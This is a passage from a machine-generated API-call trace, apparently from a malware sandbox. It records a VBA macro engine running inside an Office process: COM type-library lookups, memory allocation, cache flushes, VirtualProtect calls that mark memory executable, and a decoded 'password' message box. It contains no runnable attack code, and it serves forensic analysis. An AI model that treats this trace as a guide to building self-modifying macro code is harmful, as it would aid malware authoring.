[2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc860 | out: ppvObject=0x1dc860*=0x0) returned 0x80004002 [0157.595] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x991f1e0 [0157.595] IMalloc:Free (This=0x7fefecb5380, pv=0x991f1e0) [0157.595] IUnknown:AddRef (This=0xa02ae48) returned 0x5 [0157.595] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02ae48, ppTypeAttr=0x1dcab8, pDummy=0x75a0420 | out: ppTypeAttr=0x1dcab8, pDummy=0x75a0420*=0x0) returned 0x0 [0157.595] ITypeInfo:LocalReleaseTypeAttr (This=0xa02ae48) returned 0x0 [0157.595] IUnknown:Release (This=0xa02ae48) returned 0x4 [0157.595] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.595] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.595] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.595] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.595] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.595] GetCurrentProcess () returned 0xffffffffffffffff [0157.595] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x5c) returned 1 [0157.595] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.595] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02ae48, ppTypeAttr=0x1dc050, pDummy=0x0 | out: ppTypeAttr=0x1dc050, pDummy=0x0) returned 0x0 [0157.595] ITypeInfo:LocalReleaseTypeAttr (This=0xa02ae48) returned 0x0 [0157.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961f35c, cbMultiByte=36, lpWideCharStr=0x75a1fac, cchWideChar=74 | out: lpWideCharStr="MsgBox ('This is a valid password.')") returned 36 [0157.596] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.596] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.596] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.596] GetCurrentProcess () returned 0xffffffffffffffff [0157.596] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x4c) returned 1 [0157.596] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.596] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dbfd0, pDummy=0x0 | out: ppTypeAttr=0x1dbfd0, pDummy=0x0) returned 0x0 [0157.596] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0157.596] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.596] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.596] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.596] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.596] GetCurrentProcess () returned 0xffffffffffffffff [0157.596] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x75) returned 1 [0157.596] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.596] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b420, ppTypeAttr=0x1dc210, pDummy=0x0 | out: ppTypeAttr=0x1dc210, pDummy=0x0) returned 0x0 [0157.596] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b420) returned 0x0 [0157.596] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121118, ppTLib=0x1dc590, pIndex=0x0 | out: ppTLib=0x1dc590*=0x9ab5f00, pIndex=0x0) returned 0x0 [0157.597] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc5a0, pDummy=0x0 | out: ppTLibAttr=0x1dc5a0, pDummy=0x0) returned 0x0 [0157.597] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0157.597] IUnknown:Release (This=0x9ab5f00) returned 0xa [0157.597] ITypeInfo:RemoteGetDllEntry (in: This=0xa121118, memid=1610612738, invkind=1, refPtrFlags=0x1dc590, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0157.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0157.597] ITypeInfo:RemoteGetDllEntry (in: This=0xa121118, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc590, pbstrName=0x0, pwOrdinal=0x1dc5b0 | out: pBstrDllName=0x1dc590*=0x0, pbstrName=0x0, pwOrdinal=0x1dc5b0*=0xc820) returned 0x0 [0157.597] ITypeInfo:RemoteGetDllEntry (in: This=0xa121118, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc590, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc590, pwOrdinal=0x500000000) returned 0x0 [0157.597] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc440, pIndex=0x0 | out: ppTLib=0x1dc440*=0x9ab5f00, pIndex=0x0) returned 0x0 [0157.597] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc450, pDummy=0x0 | out: ppTLibAttr=0x1dc450, pDummy=0x0) returned 0x0 [0157.597] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0157.597] IUnknown:Release (This=0x9ab5f00) returned 0xa [0157.597] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612748, invkind=1, refPtrFlags=0x1dc440, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0157.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0157.597] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612748, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc440, pbstrName=0x0, pwOrdinal=0x1dc460 | out: pBstrDllName=0x1dc440*=0x0, pbstrName=0x0, pwOrdinal=0x1dc460*=0xc6d0) returned 0x0 [0157.597] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612748, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc440, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc440, pwOrdinal=0x500000000) returned 0x0 [0157.597] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc310, pIndex=0x0 | out: ppTLib=0x1dc310*=0x9ab5f00, pIndex=0x0) returned 0x0 [0157.598] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc320, pDummy=0x0 | out: ppTLibAttr=0x1dc320, pDummy=0x0) returned 0x0 [0157.598] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0157.598] IUnknown:Release (This=0x9ab5f00) returned 0xa [0157.598] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x1dc310, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0157.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0157.598] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc310, pbstrName=0x0, pwOrdinal=0x1dc330 | out: pBstrDllName=0x1dc310*=0x0, pbstrName=0x0, pwOrdinal=0x1dc330*=0xc5a0) returned 0x0 [0157.598] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc310, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc310, pwOrdinal=0x500000000) returned 0x0 [0157.598] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc310, pIndex=0x0 | out: ppTLib=0x1dc310*=0x9ab5f00, pIndex=0x0) returned 0x0 [0157.598] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc320, pDummy=0x0 | out: ppTLibAttr=0x1dc320, pDummy=0x0) returned 0x0 [0157.598] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0157.598] IUnknown:Release (This=0x9ab5f00) returned 0xa [0157.598] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x1dc310, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0157.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0157.598] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc310, pbstrName=0x0, pwOrdinal=0x1dc330 | out: pBstrDllName=0x1dc310*=0x0, pbstrName=0x0, pwOrdinal=0x1dc330*=0xc5a0) returned 0x0 [0157.598] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc310, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc310, pwOrdinal=0x500000000) returned 0x0 [0157.598] IMalloc:Realloc (This=0x7fefecb5380, pv=0x97edf80, cb=0x618) returned 0xa3271b0 [0157.598] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc3b0, pIndex=0x0 | out: ppTLib=0x1dc3b0*=0x9ab5f00, pIndex=0x0) returned 0x0 [0157.598] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc3c0, pDummy=0x0 | out: ppTLibAttr=0x1dc3c0, pDummy=0x0) returned 0x0 [0157.598] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0157.598] IUnknown:Release (This=0x9ab5f00) returned 0xa [0157.598] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x1dc3b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0157.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0157.599] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc3b0, pbstrName=0x0, pwOrdinal=0x1dc3d0 | out: pBstrDllName=0x1dc3b0*=0x0, pbstrName=0x0, pwOrdinal=0x1dc3d0*=0xc640) returned 0x0 [0157.599] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc3b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc3b0, pwOrdinal=0x500000000) returned 0x0 [0157.599] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc450, pIndex=0x0 | out: ppTLib=0x1dc450*=0x9ab5f00, pIndex=0x0) returned 0x0 [0157.599] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc460, pDummy=0x0 | out: ppTLibAttr=0x1dc460, pDummy=0x0) returned 0x0 [0157.599] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0157.599] IUnknown:Release (This=0x9ab5f00) returned 0xa [0157.599] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x1dc450, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0157.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0157.599] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc450, pbstrName=0x0, pwOrdinal=0x1dc470 | out: pBstrDllName=0x1dc450*=0x0, pbstrName=0x0, pwOrdinal=0x1dc470*=0xc6e0) returned 0x0 [0157.599] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc450, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc450, pwOrdinal=0x500000000) returned 0x0 [0157.599] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0157.599] IUnknown:Release (This=0xa02b108) returned 0x4 [0157.599] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.599] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.599] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.599] GetCurrentProcess () returned 0xffffffffffffffff [0157.599] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x4c) returned 1 [0157.599] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.599] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc320, pDummy=0x0 | out: ppTypeAttr=0x1dc320, pDummy=0x0) returned 0x0 [0157.599] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0157.599] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.599] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.599] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.599] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.599] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.600] GetCurrentProcess () returned 0xffffffffffffffff [0157.600] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x5c) returned 1 [0157.600] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.600] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02ae48, ppTypeAttr=0x1dc560, pDummy=0x0 | out: ppTypeAttr=0x1dc560, pDummy=0x0) returned 0x0 [0157.600] ITypeInfo:LocalReleaseTypeAttr (This=0xa02ae48) returned 0x0 [0157.600] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc310, pIndex=0x0 | out: ppTLib=0x1dc310*=0x9ab5f00, pIndex=0x0) returned 0x0 [0157.600] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc320, pDummy=0x0 | out: ppTLibAttr=0x1dc320, pDummy=0x0) returned 0x0 [0157.600] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0157.600] IUnknown:Release (This=0x9ab5f00) returned 0xa [0157.600] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x1dc310, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0157.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0157.600] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc310, pbstrName=0x0, pwOrdinal=0x1dc330 | out: pBstrDllName=0x1dc310*=0x0, pbstrName=0x0, pwOrdinal=0x1dc330*=0xc5a0) returned 0x0 [0157.600] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc310, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc310, pwOrdinal=0x500000000) returned 0x0 [0157.600] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc310, pIndex=0x0 | out: ppTLib=0x1dc310*=0x9ab5f00, pIndex=0x0) returned 0x0 [0157.600] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc320, pDummy=0x0 | out: ppTLibAttr=0x1dc320, pDummy=0x0) returned 0x0 [0157.600] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0157.600] IUnknown:Release (This=0x9ab5f00) returned 0xa [0157.600] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x1dc310, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0157.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0157.600] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc310, pbstrName=0x0, pwOrdinal=0x1dc330 | out: pBstrDllName=0x1dc310*=0x0, pbstrName=0x0, pwOrdinal=0x1dc330*=0xc5a0) returned 0x0 [0157.600] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc310, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc310, pwOrdinal=0x500000000) returned 0x0 [0157.600] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc3b0, pIndex=0x0 | out: ppTLib=0x1dc3b0*=0x9ab5f00, pIndex=0x0) returned 0x0 [0157.600] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc3c0, pDummy=0x0 | out: ppTLibAttr=0x1dc3c0, pDummy=0x0) returned 0x0 [0157.600] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0157.600] IUnknown:Release (This=0x9ab5f00) returned 0xa [0157.600] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x1dc3b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0157.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0157.601] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc3b0, pbstrName=0x0, pwOrdinal=0x1dc3d0 | out: pBstrDllName=0x1dc3b0*=0x0, pbstrName=0x0, pwOrdinal=0x1dc3d0*=0xc640) returned 0x0 [0157.601] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc3b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc3b0, pwOrdinal=0x500000000) returned 0x0 [0157.601] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc450, pIndex=0x0 | out: ppTLib=0x1dc450*=0x9ab5f00, pIndex=0x0) returned 0x0 [0157.601] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc460, pDummy=0x0 | out: ppTLibAttr=0x1dc460, pDummy=0x0) returned 0x0 [0157.601] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0157.601] IUnknown:Release (This=0x9ab5f00) returned 0xa [0157.601] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x1dc450, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0157.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0157.601] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc450, pbstrName=0x0, pwOrdinal=0x1dc470 | out: pBstrDllName=0x1dc450*=0x0, pbstrName=0x0, pwOrdinal=0x1dc470*=0xc6e0) returned 0x0 [0157.601] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc450, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc450, pwOrdinal=0x500000000) returned 0x0 [0157.601] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0157.601] IUnknown:Release (This=0xa02b108) returned 0x4 [0157.601] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.601] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.601] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.601] GetCurrentProcess () returned 0xffffffffffffffff [0157.601] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x4c) returned 1 [0157.601] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.601] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc320, pDummy=0x0 | out: ppTypeAttr=0x1dc320, pDummy=0x0) returned 0x0 [0157.601] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0157.601] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.601] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.601] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.601] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.601] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.601] GetCurrentProcess () returned 0xffffffffffffffff [0157.601] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x5c) returned 1 [0157.601] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.601] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02ae48, ppTypeAttr=0x1dc560, pDummy=0x0 | out: ppTypeAttr=0x1dc560, pDummy=0x0) returned 0x0 [0157.601] ITypeInfo:LocalReleaseTypeAttr (This=0xa02ae48) returned 0x0 [0157.606] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9aa5300, cb=0xc10) returned 0x98c1110 [0157.606] IMalloc:Realloc (This=0x7fefecb5380, pv=0x98c1110, cb=0x87a) returned 0x98c1110 [0157.606] IMalloc:Free (This=0x7fefecb5380, pv=0x95a28b0) [0157.606] GetCurrentProcess () returned 0xffffffffffffffff [0157.606] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c553c1, dwSize=0x8) returned 1 [0157.606] GetCurrentProcess () returned 0xffffffffffffffff [0157.606] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c553c0, dwSize=0x8) returned 1 [0157.606] GetCurrentProcess () returned 0xffffffffffffffff [0157.606] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55259, dwSize=0x8) returned 1 [0157.606] GetCurrentProcess () returned 0xffffffffffffffff [0157.606] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55258, dwSize=0x8) returned 1 [0157.606] GetCurrentProcess () returned 0xffffffffffffffff [0157.606] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55268, dwSize=0x2) returned 1 [0157.606] GetCurrentProcess () returned 0xffffffffffffffff [0157.606] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c552bc, dwSize=0x55) returned 1 [0157.606] VirtualProtect (in: lpAddress=0x9c552bc, dwSize=0x58, flNewProtect=0x40, lpflOldProtect=0x1dc90c | out: lpflOldProtect=0x1dc90c*=0x40) returned 1 [0157.607] GetCurrentProcess () returned 0xffffffffffffffff [0157.607] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c553c1, dwSize=0x8) returned 1 [0157.607] GetCurrentProcess () returned 0xffffffffffffffff [0157.607] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c553c0, dwSize=0x8) returned 1 [0157.607] GetCurrentProcess () returned 0xffffffffffffffff [0157.608] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c553d0, dwSize=0x2) returned 1 [0157.608] GetCurrentProcess () returned 0xffffffffffffffff [0157.608] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55424, dwSize=0x45) returned 1 [0157.608] VirtualProtect (in: lpAddress=0x9c55424, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x1dc90c | out: lpflOldProtect=0x1dc90c*=0x40) returned 1 [0157.608] GetCurrentProcess () returned 0xffffffffffffffff [0157.608] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c554ac, dwSize=0x45) returned 1 [0157.609] VirtualProtect (in: lpAddress=0x9c554ac, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x1dc90c | out: lpflOldProtect=0x1dc90c*=0x40) returned 1 [0157.609] GetCurrentProcess () returned 0xffffffffffffffff [0157.609] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55529, dwSize=0x8) returned 1 [0157.609] GetCurrentProcess () returned 0xffffffffffffffff [0157.609] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55528, dwSize=0x8) returned 1 [0157.609] GetCurrentProcess () returned 0xffffffffffffffff [0157.609] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55538, dwSize=0x2) returned 1 [0157.609] GetCurrentProcess () returned 0xffffffffffffffff [0157.609] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54f30, dwSize=0x5d) returned 1 [0157.609] VirtualProtect (in: lpAddress=0x9c54f30, dwSize=0x60, flNewProtect=0x40, lpflOldProtect=0x1dc90c | out: lpflOldProtect=0x1dc90c*=0x40) returned 1 [0157.610] GetCurrentProcess () returned 